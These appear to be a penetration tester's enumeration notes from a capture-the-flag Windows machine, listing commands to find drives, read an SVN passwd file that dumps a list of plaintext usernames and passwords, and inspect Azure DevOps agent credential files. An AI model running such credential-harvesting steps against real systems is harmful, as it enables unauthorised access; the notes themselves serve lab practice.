10 box manual enum

c:\Users>dir
Directory of c:\Users
2020-07-07  17:53    <DIR>          .
2020-07-07  17:53    <DIR>          ..
2020-03-28  15:59    <DIR>          .NET v4.5
2020-03-28  15:59    <DIR>          .NET v4.5 Classic
2020-08-18  00:33    <DIR>          Administrator
2021-09-23  21:32    <DIR>          Public
2020-07-22  01:11    <DIR>          restorer
2020-07-08  19:22    <DIR>          robisl
# cannot enter any; access denied

# saw W:\ in PEAS and other PE scripts
# checking for all drives attached
c:\Users\Public>wmic logicaldisk get deviceid, volumename, description
Description       DeviceID  VolumeName
Local Fixed Disk  C:
Local Fixed Disk  W:        Work
[OR]
c:\Users\Public>fsutil fsinfo drives
Drives: C:\ W:\
# powershell -c get-psdrive -psprovider filesystem

w:\>dir
Directory of w:\
2020-06-16  18:59    <DIR>          agents
2020-03-28  15:57    <DIR>          AzureDevOpsData
2020-04-03  11:31    <DIR>          sites
2020-06-20  16:04    <DIR>          svnrepos

# in p.ps1 found W:\svnrepos\www\conf\passwd
# default is: W:\svnrepos\www\conf>more authz

W:\agents\agent01>more W:\svnrepos\www\conf\passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
# exploring W:\agents\
W:\agents\agent01>dir /a
dir /a
 Volume in drive W is Work
 Volume Serial Number is E82A-AEA8

 Directory of W:\agents\agent01

2020-04-02  22:05    <DIR>          .
2020-04-02  22:05    <DIR>          ..
2020-04-02  22:05               163 .agent
2020-04-02  22:05               241 .credentials
2020-04-02  22:05             1894 .credentials_rsaparams
2020-04-02  22:05                32 .service
2020-04-02  22:05    <SYMLINKD>     bin [w:\agents\agentbase\bin]
2020-04-02  22:05    <SYMLINK>      config.cmd [w:\agents\agentbase\config.cmd]
2020-04-02  22:05    <SYMLINKD>     externals [w:\agents\agentbase\externals]
2020-04-02  22:05    <SYMLINK>      run.cmd [w:\agents\agentbase\run.cmd]
2021-09-23  22:24    <DIR>          _diag
2021-09-23  22:24    <DIR>          _work
               6 File(s)          2330 bytes
			   
W:\agents\agent01>more .agent
more .agent
{
  "agentId": 1,
  "agentName": "Hamilton01",
  "poolId": 1,
  "poolName": "Default",
  "serverUrl": "http://127.0.0.1:8080/",
  "workFolder": "_work"
}

W:\agents\agent01>more .credentials
more .credentials
{
  "scheme": "OAuth",
  "data": {
    "clientId": "0835e5a8-1280-4512-82ea-366912d1fd5a",
    "authorizationUrl": "http://127.0.0.1:8080/_apis/oauth2/token",
    "oauthEndpointUrl": "http://127.0.0.1:8080/_apis/oauth2/token"
  }
}

# loooking more closely at the passwords we got password for robisl
# user on box

Last updated